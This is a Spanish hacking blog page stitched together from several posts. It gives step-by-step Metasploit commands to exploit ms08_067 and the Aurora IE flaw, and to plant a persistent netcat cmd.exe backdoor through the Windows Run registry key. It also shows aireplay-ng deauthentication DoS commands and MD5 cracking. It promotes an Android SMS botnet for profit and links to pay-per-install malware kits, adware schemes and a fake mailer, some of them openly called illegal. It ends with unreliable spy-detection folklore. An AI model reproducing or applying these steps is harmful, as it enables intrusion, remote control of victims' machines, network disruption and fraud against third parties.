Social Icons

domingo, 26 de agosto de 2012

Backdoor en window con metasploit y netcat

Buenas buenas gente!
hoy les traigo com hacer un backdoor a un window$ con 'Metasploit' ( el dios de dioses ) y el netcat (nc)
si usan un poco la imaginacion se puede hacer un monton de cosas ;) 

primero copiamos este archivo que es el netcat para windows al escritorio para un acceso mas rapido


root@bt:~# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/

ahora abrimos el metasploit y comenzamos la configuracion

root@bt:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi)) > set lhost 192.168.1.102 (IP victima)
msf exploit(ms08_067_netapi)) > set rhost 192.168.1.103 (nuestra IP)
msf exploit(ms08_067_netapi)) > exploit

usa vez que allamos explotando la vulnerabilidad y tengamos acceso a meterpreter empezamos a configurar el backdoor

meterpreter > upload /root/Desktop/nc.exe C:\\WINDOWS\\system32\\
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reg setval -k HKLM\\Software\\Windows\\CurrentVerion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 666 -e cmd.exe"
meterpreter > reg enumkey -k HKLM\\Software\\Windows\\CurrentVerion\\RUN
meterpreter > reboot

el windows se reiniciara, y ejecutara nuestro backdoor al inicio.

y ahora nos conectamos que el netcat de nuestra maquina


root@bt:~# nc 192.168.1.102 666

Listo :D

Tips to Detect Spies Devices !

Bueno pues navegando me encontre con algunos Tips muy interesantes y se los dejo a ustedes espero les sea de ayuda



COMO DESCUBRIR UNA CAMARA OCULTA CON TU CELULAR 

Si sospechas tener instalada una cámara oculta en tu oficina, habitación, etc., puedes detectarla fácilmente utilizando la cámara de tu teléfono celular, simplemente apaga todas las luces del recinto y toma varias fotografías de los lugares que te pasarían mas desapercibidos, con el FLASH activado, el DCC (ojo digital de la cámara oculta) aparecerá como un pequeño punto brillante (reflejado en la lente de enfoque de dicha cámara).



EL MEJOR LUGAR PARA COMUCNICAR UN SECRETO 

Si tienes que comunicar un "secreto" (verbalmente) el mejor lugar para hacerlo (siendo civil) es un GRAN VIVERO (invernadero) después de efectuarse el "riego automático".La cantidad de plantas y arboles en ese lugar, hacen imposible la escucha utilizando micrófonos por estática, la "entropía" en las formas de las hojas, dificulta la escucha por "lectura de labios", el nylon que es utilzado normalmente para recubrir las paredes del vivero (su opacidad y flexibilidad al viento) hacen casi imposible la escucha por "micrófonos lásers", finalmente la forma "curva" de sus paredes dificultan otros tipos de escuchas.

COMO ANULAR LA SEÑAL DE TU CELULAR 

Si deseas no ser "plotteado" por tu empresa de telefonía o Gobierno, ni que, quien posea el conocimiento suficiente, escuche tus conversaciones a través del micrófono de tu celular, pues retírale la batería y acto seguido colócalo dentro del horno microondas (apagado), su estructura esta especialmente diseñada para BLOQUEAR este tipo de señales.

Como descubrir un "MICROFONO OCULTO" Con un radio de FM

Si sospechas tener instalado un micrófono oculto en tu casa u oficina, puedes detectarlo fácilmente si transmite por modulación de frecuencias, utilizando un radio receptor de FM y audifonos o auriculares.

Simplemente apaga todas las fuentes de sonido e interferencias (celular, TV, microondas, placas Wi-Fi, etc.), acto seguido aplica leves golpecitos continuos sobre las paredes y mueve el dial (sintonizador) de tu radio muy lentamente (completo, de izquierda a derecha y vs)

Si escuchas un "chasquido" o un "sonido repetitivo", puede tratarse de uno, sal de tu casa y desde un teléfono público ponte en contacto con alguna empresa que posea instrumental mas sensible y ayude a su exacta ubicación.



EN DONDE BUSCAR UN MICROFONO OCULTO (VISUALMENTE)

Si sospechas tener instalado un micrófono oculto en tu casa u oficina, puedes comenzar a buscarlo (visualmente) en los siguientes sitios: el interior de las tapas de luz (o tomacorrientes), alargues eléctricos (extensores de línea), veladores (eléctricos y a pilas), cuadros, electrodomésticos, y básicamente en todo lugar que permanezca conectado a la red eléctrica o posea baterías para su uso, como ser relojes de pared o mesa, termómetros para colgar, etc. 


COMO RECONOCER UN ESPEJO SEMI TRANSLUCIDO O FALSO

Para descubrir si te están observando del otro lado de un espejo (por ejemplo, en un probador de ropa, hotel, etc.), simplemente coloca tu uña tocando el vidrio, si la imagen de tu uña toca a la verdadera uña de tu dedo "COOOOOORREEEEE" a hacer la denuncia!!! pues se trata de un espejo "F.A.L.S.O.", por el contrario, si notas un espacio de unos milímetros entre la imagen de tu uña reflejada en el espejo y la verdadera de tu dedo "ya puedes estar tranquilo!!" el espejo es REALMENTE un espejo (esto es así, porque en el espejo "VERDADERO", el material reflectivo se encuentra detras del vidio del espejo, por eso ves la separación entre las dos imágenes, mientras que si es falso el material reflectivo se deposita en la parte del vidio mas próxima a la persona, es decir, sobre el lado opuesto al de la pared en donde esté colgado dicho espejo)


COMO DESCUBRIR A UN MENTIROSO

Para descubrir si alguien "miente", debemos fijarnos si no transpira en sus manos, frente y a los costados de su cara, si su gesticulación es excesiva (como un comediante), o se toca la nariz (si es adulto) o tiende a tapar su boca (para los niños). Lo mejor, hacerles varias preguntas y luego repetírselas en orden contrario" 

COMO COMUNICAR UN MENSAJE SECRETO

Para escribir un mensaje "oculto" en donde estemos, debemos utilizar cualquier compuesto de carbono como tinta, sobre un papel preferentemente en blanco, lo que tengamos a mano en esa situación y momento, por ejemplo: limón (de la cocina), orina (ingresamos a un baño público p.e.), vinagre (nos pedimos una ensalada que lo trae en sobres y lo utilizamos sobre la servilleta que normalmente se adjunta), etc., luego para leerlo nuestra contraparte solo debe calentar cuidadosamente con un encendedor el papel para que "reaccione" el carbono y se oscurezca



Free Fake Mailer

Free Fake Mailer   http://emkei.cz/

Bloquear un Wifi Temporalmente

1.- INHIBIDOR: Un Inhibidor de Señales Wifi es auqella herramienta fisica cuyo fin es la de hacer nulas las conexiones en una determinada Zona.

VEREMOS ALGUNOS INHIBIDORES PARA SEÑALES WIFI:









sin duda tienen muy buena pinta y son muy discretos.
Pag: http://www.inhibidores.com 

2.-DoS

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

* ponemos nuestra tarjeta en modo monitor.
Código:
airmon-ng start wlan0
* Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico.
Código:
airmon-ng -c 5 mon0
Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

* DoS al punto de acceso:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
Código:
aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

* DoS al Cliente:
Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.
Código:
aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:

Descarga: http://www.mediafire.com/?9tutyrz1c9l1dxe

Fuentes: http://www.inhibidores.com http://www.blackploit.com http://andres-elladooscuro.blogspot.mx/

Android Botnet



En esta ocasion les traigo algo muy curioso que encontre, se trata de una botnet para telefonos moviles con Android.
La funcion principal es infectar muchos telefonos moviles, y luego por medio de comandos, ejecuta alguna accion. En este caso es el envio de sms.
Pensando un poco, llegue a la conclusion de que se le podria sacar provecho con esas paginas que pagan por sms. Ya que si se infectan 50 telefonos y se envian 4 mensajes con cada uno de ellos, harian un total de 200 sms... Imaginen el dinero que se podria sacar con eso...
No expongo esto para que hagan exactamente eso, sino para que estudien su codigo y para que vean con que fuerza se vienen estos nuevos malwares futuristicos.


El comando del bot es:

BOT: SPAM {number to spam} {message}

Saludos a todos!

SEO Browser



Cuando hablamos de métodos y técnicas que no son legales para posicionarse en los buscadores pero que sirven para adquirir una mejor posición en los resultados de los buscadores estamos hablando de Black Hat SEO, entre las características que más destacan el uso de esta técnica se encuentran algunas de las siguientes:

Romper las reglas establecidas por los buscadores
Afectar la experiencia de usuario de forma negativa debido a la aplicación de algunas de estas técnicas.
Presentación de contenido alternado por algoritmos para generar contenido automático.

http://www.mediafire.com/?yp1cfww75h55mbz

Temas de Infeccion Pay - Per Install

Aqui algunos temas de Infeccion Pay - Per Install
Porfavor usenlas pero con cuidado porque pueden tener problemas con la ley.

Download: http://www.mediafire.com/?mr4bcmy4c5ij0q5

Super Sign-Up System




The Sign Up System Súper fue diseñado para el principiante en mente. Incluso si usted nunca ha creado su propia página de aterrizaje o construido tu lista esta guía paso a paso le dirá qué hacer! No hay nada más fácil!

Pero su tiempo es demasiado precioso para ir a través de todos los detalles técnicos. Usted es un vendedor y quieres ir directo al grano y empezar a promocionar su página de destino y para construir su lista, ya que es donde está el dinero de verdad.

Pasé años tratando de encontrar la manera de construir una lista rápidamente, construir una relación con ellos y ganar dinero en el proceso. Ahora usted va a llevar a mi conocimiento y el trabajo y aplicarlo con estas 5 páginas importantes HTML, productos de información y guía de inicio rápido!

Esto es lo que está recibiendo hoy! ..

1. Un Opt-In Landing Page
2. Una página de confirmación
3. Una Página de descarga
4. Una página de oferta especial
5. Una oferta especial Página de descarga
6. Todos los libros electrónicos y los Derechos de Reventa material
7. Bono Extra! La Guía de inicio rápido

http://www.mediafire.com/download.php?5d7ro713b9c34m1

Make Money



Que es Make Money?

Es hacer dinero de una manera facil pero no se considera como una forma legal, ya que son, básicamente, la difusión de adware y spyware a la computadora, incluso de otros usuarios. debe ser fuerte para ser capaz de hacerlo y puedo decir que pago por las empresas de instalación son aún más fuertes si se puede sobrevivir a la lucha contra la ley. El potencial de ganancias es en esta parte de Internet de muy alta. Usted puede hacer que hasta $ 7,000 USD por día!

Template de make M listo para usarce
Recuerda que son productos Delictivos y nesesitas conocimientos previos para su uso

http://www.mediafire.com/?cxvttndqmlcx7vj

Crackear Hash MD5



BozoCrack es un eficaz herramienta para crackear contraseñas en Hash MD5 que no usa mucho el CPU/GPU. En lugar de diccionarios o fuerza bruta, BozoCrack limita a declarar la contraseña en texto plano. En concreto, se googlea el hash MD5 y los resultados aparece en texto en algún lugar de la primera página de resultados. BozoCrack esta programado en Ruby.

Descargamos la Tool: https://github.com/juuso/BozoCrack

1) Descargar & descomprimir:
Código: [Seleccionar]
root@bt:~# cd Desktop
root@bt:~/Desktop# unzip juuso-BozoCrack-4a55c97.zip
Archive:  juuso-BozoCrack-4a55c97.zip
4a55c971dfde938ca5acd56226965d18893bf23c
   creating: juuso-BozoCrack-4a55c97/
  inflating: juuso-BozoCrack-4a55c97/README.md  
  inflating: juuso-BozoCrack-4a55c97/bozocrack.rb  
root@bt:~/Desktop#

2) Encryptar un texto:
Nos dirigimos a: http://md5encryption.com/ colocamos un texto & lo encryptamos:


El texto que coloque es: administrator & el MD5 es: 200ceb26807d6bf99fd6f4f0d1ca54d4

3) Copiar el texto en un archivo:
Entramos a la carpeta descomprimida "juuso-BozoCrack-4a55c97" crear un archivo vacio con cualquier nombre, dentro del archivo colocamos el MD5 200ceb26807d6bf99fd6f4f0d1ca54d4 & lo guardamos en extension .txt


4) Copiamos la carpeta:
Nos dirigimos al escritorio (en mi caso) copiamos toda la carpeta & lo pegamos en sistema de archivos - pentest - passwords


5) Ejecutamos la Tool:
Código: [Seleccionar]
root@bt:~# cd /pentest/passwords
root@bt:/pentest/passwords# ls
cewl     findmyhash       john                     oclhashcat-lite  sucrack
chntpw   hashcat          juuso-BozoCrack-4a55c97  pack             wce
cmospwd  hashcat-gui      keimpx                   patator          wordlists
crunch   hashcat-utils    oclhashcat               pipal
cupp     hash-identifier  oclhashcat+              sipcrack
root@bt:/pentest/passwords# cd juuso-BozoCrack-4a55c97
root@bt:/pentest/passwords/juuso-BozoCrack-4a55c97# ls
bozocrack.rb  md5.txt  README.md
root@bt:/pentest/passwords/juuso-BozoCrack-4a55c97# ruby bozocrack.rb md5.txt
Loaded 1 unique hashes
200ceb26807d6bf99fd6f4f0d1ca54d4:administrator
root@bt:/pentest/passwords/juuso-BozoCrack-4a55c97#


Como podemos apreciar en este tutorial, vemos claramente que los pasos a seguir son faciles; si queremos desencryptar mas de 1, solo agregamos los MD5 al archivo md5.txt

Espero les guste.

Saludos...

Usando Exploit Aurora

Tratare de explicarme lo mas que se pueda :


( Aviso que el exploit es para la version 6 7 de IE la 8 ya tiene actualizacion ! ) 

Para empezar vamos a buscar el exploit 


msf >

msf > use windows/browser/ms10_002_aurora <--Seleccionamos el exploit

msf exploit(ms10_002_aurora) > 

msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp <--Seleccionamos un PAYLOAD, usar meterpreter para mas comodidad

msf exploit(ms10_002_aurora) > show options <--Miramos las opciones del exploit
Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 <--La ip que se conectara la victima (la muestra :P
SRVPORT 8080 <--El puerto con el que conectara la Victima
SSL false <-- Lo dejamos por defecto 
SSLVersion SSL3 <-- Lo dejamos por defecto 
URIPATH <-- La ULR en la que se tendra que explorar la victima

Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process <---Lo dejamos por defecto
LHOST <--<El Host de nuestro payload
LPORT 4444 <---El Puerto de nuestro payload


msf exploit(ms10_002_aurora) >

opciones del exploit

set SRVHOST xxx.xxx.xxx.xxx <--La ip que se conectara la victima (la muestra :P
set SRVPORT 80 <--El puerto con el que conectara la Victima 
set URIPATH / <-- La ULR en la que se tendra que explorar la victima

opciones del payload en este caso solo modificamos el host y el puerto lo dejammos por defecto

set LHOST xxx.xxx.xxx.xxx

msf exploit(ms10_002_aurora) >exploit

y despues nos aparesera la ip con la que la victima tendra que abrir ejemplo

http://xxx.xxx.x.xx:8080/ <--Que seran SRVHOST y SRVPORT

Una ves que la victima entre en la direccion http://xxx.xxx.x.xx:8080/ y nos notifique el metasploit escribimos

sessions -i 1 <--Por que es la primera victima si fuera una segunda seria sessions -i 2

Meterpreter: shell

Y listo Tendremos una Shell

Esto es en la mayoria de browser del metasploit espero que les sirva salu2... 

Platinum Hide IP v3.0.7.2-full

-Anónimo navegación por Internet
  -Protege la identidad en la web: prevenir el robo de identidad u otra información personal
  -Puede acceder a sitios bloqueados



Dowload Link: http://uploading.com/files/3c9c8e55/Platinum.Hide.IP.v3.0.7.2.full.rar/